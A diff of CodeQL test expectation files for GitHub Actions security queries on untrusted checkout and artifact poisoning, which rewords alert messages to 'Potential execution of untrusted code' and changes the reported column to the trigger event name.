buildScanPublishPrevious\n | Potential artifact poisoning in $@, which may be controlled by an external user ($@). | .github/workflows/test25.yml:39:14:40:45 | ./gradlew buildScanPublishPrevious\n | ./gradlew buildScanPublishPrevious\n | .github/workflows/test25.yml:2:3:2:14 | workflow_run | workflow_run | 
diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected
index ec6a664a7ab..35d61dac5fa 100644
--- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected
+++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected
@@ -312,43 +312,43 @@ edges | .github/workflows/workflow_run_untrusted_checkout_2.yml:13:9:16:6 | Uses Step | .github/workflows/workflow_run_untrusted_checkout_2.yml:16:9:18:31 | Uses Step | | .github/workflows/workflow_run_untrusted_checkout_3.yml:13:9:16:6 | Uses Step | .github/workflows/workflow_run_untrusted_checkout_3.yml:16:9:18:31 | Uses Step | #select -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:23:9:26:6 | Uses Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/reusable_caller1.yaml:4:3:4:21 | pull_request_target | .github/workflows/reusable_caller1.yaml | -| .github/workflows/artifactpoisoning91.yml:28:9:29:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:28:9:29:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/artifactpoisoning91.yml:3:3:3:14 | workflow_run | .github/workflows/artifactpoisoning91.yml | -| .github/workflows/artifactpoisoning91.yml:29:9:29:27 | Run Step | .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:29:9:29:27 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/artifactpoisoning91.yml:3:3:3:14 | workflow_run | .github/workflows/artifactpoisoning91.yml | -| .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/artifactpoisoning92.yml:3:3:3:14 | workflow_run | .github/workflows/artifactpoisoning92.yml | -| 
.github/workflows/artifactpoisoning92.yml:29:9:29:27 | Run Step | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:9:29:27 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/artifactpoisoning92.yml:3:3:3:14 | workflow_run | .github/workflows/artifactpoisoning92.yml | -| .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | .github/workflows/auto_ci.yml | -| .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | .github/workflows/auto_ci.yml | -| .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | .github/workflows/auto_ci.yml | -| .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | .github/workflows/auto_ci.yml | -| .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | .github/workflows/dependabot3.yml:15:9:20:6 | Uses Step | .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/dependabot3.yml:3:5:3:23 | pull_request_target | 
.github/workflows/dependabot3.yml | -| .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/gitcheckout.yml:2:3:2:21 | pull_request_target | .github/workflows/gitcheckout.yml | -| .github/workflows/label_trusted_checkout2.yml:17:7:21:4 | Run Step | .github/workflows/label_trusted_checkout2.yml:12:7:16:4 | Uses Step | .github/workflows/label_trusted_checkout2.yml:17:7:21:4 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/label_trusted_checkout2.yml:2:3:2:21 | pull_request_target | .github/workflows/label_trusted_checkout2.yml | -| .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:5:3:5:15 | issue_comment | .github/workflows/level0.yml | -| .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:7:3:7:21 | pull_request_target | .github/workflows/level0.yml | -| .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:5:3:5:15 | issue_comment | .github/workflows/level0.yml | -| .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:7:3:7:21 | 
pull_request_target | .github/workflows/level0.yml | -| .github/workflows/poc2.yml:42:9:47:6 | Uses Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/poc2.yml:4:3:4:15 | issue_comment | .github/workflows/poc2.yml | -| .github/workflows/poc2.yml:52:9:58:24 | Run Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/poc2.yml:4:3:4:15 | issue_comment | .github/workflows/poc2.yml | -| .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | .github/workflows/pr-workflow.yml:216:9:222:6 | Uses Step | .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | -| .github/workflows/pr-workflow.yml:256:9:261:6 | Uses Step | .github/workflows/pr-workflow.yml:250:9:256:6 | Uses Step | .github/workflows/pr-workflow.yml:256:9:261:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | -| .github/workflows/pr-workflow.yml:290:9:295:6 | Uses Step | .github/workflows/pr-workflow.yml:284:9:290:6 | Uses Step | .github/workflows/pr-workflow.yml:290:9:295:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | -| .github/workflows/pr-workflow.yml:391:9:395:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:391:9:395:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | 
.github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | -| .github/workflows/pr-workflow.yml:395:9:404:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:395:9:404:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | -| .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | -| .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | -| .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | -| .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | .github/workflows/reusable_local.yml:23:9:26:6 | Uses Step | .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/reusable_caller3.yaml:4:3:4:21 | pull_request_target | .github/workflows/reusable_caller3.yaml | -| .github/workflows/test7.yml:33:9:36:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | 
Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | .github/workflows/test7.yml | -| .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | .github/workflows/test7.yml | -| .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | .github/workflows/test7.yml | -| .github/workflows/test10.yml:25:9:30:2 | Run Step | .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test10.yml:8:3:8:21 | pull_request_target | .github/workflows/test10.yml | -| .github/workflows/test11.yml:90:7:93:54 | Uses Step | .github/workflows/test11.yml:84:7:90:4 | Uses Step | .github/workflows/test11.yml:90:7:93:54 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test11.yml:5:3:5:15 | issue_comment | .github/workflows/test11.yml | -| .github/workflows/test17.yml:19:15:23:58 | Uses Step | .github/workflows/test17.yml:12:15:19:12 | Uses Step | .github/workflows/test17.yml:19:15:23:58 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test17.yml:3:5:3:16 | workflow_run | .github/workflows/test17.yml | -| .github/workflows/test27.yml:21:9:22:16 | Run Step | .github/workflows/test27.yml:18:9:21:6 | Uses Step | .github/workflows/test27.yml:21:9:22:16 | Run Step | Execution of untrusted code on a privileged workflow ($@) 
| .github/workflows/test26.yml:4:3:4:14 | workflow_run | .github/workflows/test26.yml | -| .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout3.yml:4:3:4:14 | workflow_run | .github/workflows/untrusted_checkout3.yml | -| .github/workflows/untrusted_checkout4.yml:35:7:41:4 | Run Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:35:7:41:4 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | .github/workflows/untrusted_checkout4.yml | -| .github/workflows/untrusted_checkout4.yml:41:7:47:4 | Run Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:41:7:47:4 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | .github/workflows/untrusted_checkout4.yml | -| .github/workflows/untrusted_checkout4.yml:47:7:51:46 | Run Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:47:7:51:46 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | .github/workflows/untrusted_checkout4.yml | -| .github/workflows/untrusted_checkout.yml:15:9:18:2 | Run Step | .github/workflows/untrusted_checkout.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout.yml:15:9:18:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout.yml:2:3:2:21 | pull_request_target | .github/workflows/untrusted_checkout.yml | -| 
.github/workflows/untrusted_checkout.yml:30:9:32:23 | Run Step | .github/workflows/untrusted_checkout.yml:23:9:26:6 | Uses Step | .github/workflows/untrusted_checkout.yml:30:9:32:23 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout.yml:2:3:2:21 | pull_request_target | .github/workflows/untrusted_checkout.yml | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:23:9:26:6 | Uses Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/reusable_caller1.yaml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/artifactpoisoning91.yml:28:9:29:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:28:9:29:6 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/artifactpoisoning91.yml:3:3:3:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning91.yml:29:9:29:27 | Run Step | .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:29:9:29:27 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/artifactpoisoning91.yml:3:3:3:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/artifactpoisoning92.yml:3:3:3:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning92.yml:29:9:29:27 | Run Step | 
.github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:9:29:27 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/artifactpoisoning92.yml:3:3:3:14 | workflow_run | workflow_run | +| .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | pull_request_target | +| .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | pull_request_target | +| .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | pull_request_target | +| .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | pull_request_target | +| .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | .github/workflows/dependabot3.yml:15:9:20:6 | Uses Step | .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/dependabot3.yml:3:5:3:23 | pull_request_target | pull_request_target | +| .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | 
.github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/gitcheckout.yml:2:3:2:21 | pull_request_target | pull_request_target | +| .github/workflows/label_trusted_checkout2.yml:17:7:21:4 | Run Step | .github/workflows/label_trusted_checkout2.yml:12:7:16:4 | Uses Step | .github/workflows/label_trusted_checkout2.yml:17:7:21:4 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/label_trusted_checkout2.yml:2:3:2:21 | pull_request_target | pull_request_target | +| .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/poc2.yml:42:9:47:6 | Uses Step | 
.github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/poc2.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/poc2.yml:52:9:58:24 | Run Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/poc2.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | .github/workflows/pr-workflow.yml:216:9:222:6 | Uses Step | .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/pr-workflow.yml:256:9:261:6 | Uses Step | .github/workflows/pr-workflow.yml:250:9:256:6 | Uses Step | .github/workflows/pr-workflow.yml:256:9:261:6 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/pr-workflow.yml:290:9:295:6 | Uses Step | .github/workflows/pr-workflow.yml:284:9:290:6 | Uses Step | .github/workflows/pr-workflow.yml:290:9:295:6 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/pr-workflow.yml:391:9:395:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:391:9:395:6 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/pr-workflow.yml:395:9:404:6 | Uses Step | 
.github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:395:9:404:6 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | .github/workflows/reusable_local.yml:23:9:26:6 | Uses Step | .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/reusable_caller3.yaml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test7.yml:33:9:36:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | +| 
.github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test10.yml:25:9:30:2 | Run Step | .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test10.yml:8:3:8:21 | pull_request_target | pull_request_target | +| .github/workflows/test11.yml:90:7:93:54 | Uses Step | .github/workflows/test11.yml:84:7:90:4 | Uses Step | .github/workflows/test11.yml:90:7:93:54 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test11.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/test17.yml:19:15:23:58 | Uses Step | .github/workflows/test17.yml:12:15:19:12 | Uses Step | .github/workflows/test17.yml:19:15:23:58 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test17.yml:3:5:3:16 | workflow_run | workflow_run | +| .github/workflows/test27.yml:21:9:22:16 | Run Step | .github/workflows/test27.yml:18:9:21:6 | Uses Step | .github/workflows/test27.yml:21:9:22:16 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test26.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | 
.github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout3.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/untrusted_checkout4.yml:35:7:41:4 | Run Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:35:7:41:4 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | issue_comment | +| .github/workflows/untrusted_checkout4.yml:41:7:47:4 | Run Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:41:7:47:4 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | issue_comment | +| .github/workflows/untrusted_checkout4.yml:47:7:51:46 | Run Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:47:7:51:46 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | issue_comment | +| .github/workflows/untrusted_checkout.yml:15:9:18:2 | Run Step | .github/workflows/untrusted_checkout.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout.yml:15:9:18:2 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout.yml:2:3:2:21 | pull_request_target | pull_request_target | +| .github/workflows/untrusted_checkout.yml:30:9:32:23 | Run Step | .github/workflows/untrusted_checkout.yml:23:9:26:6 | Uses Step | .github/workflows/untrusted_checkout.yml:30:9:32:23 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout.yml:2:3:2:21 | pull_request_target | 
pull_request_target |
diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected
index 1d6122b3747..0d5cd4086a7 100644
--- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected
+++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected
@@ -1,22 +1,22 @@ -| .github/workflows/issue_comment_direct.yml:12:9:16:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/issue_comment_direct.yml:20:9:24:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/issue_comment_direct.yml:28:9:32:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/issue_comment_direct.yml:35:9:40:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/issue_comment_direct.yml:43:9:46:126 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/issue_comment_heuristic.yml:28:9:33:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/issue_comment_heuristic.yml:48:7:50:46 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/issue_comment_octokit.yml:26:9:30:6 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/issue_comment_octokit.yml:30:9:35:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/issue_comment_octokit.yml:57:9:62:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/issue_comment_octokit.yml:79:9:83:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/issue_comment_octokit.yml:95:9:100:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/issue_comment_octokit.yml:109:9:114:66 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/pr-workflow.yml:103:9:109:6 | Uses Step | Potential execution of untrusted code on a privileged workflow. 
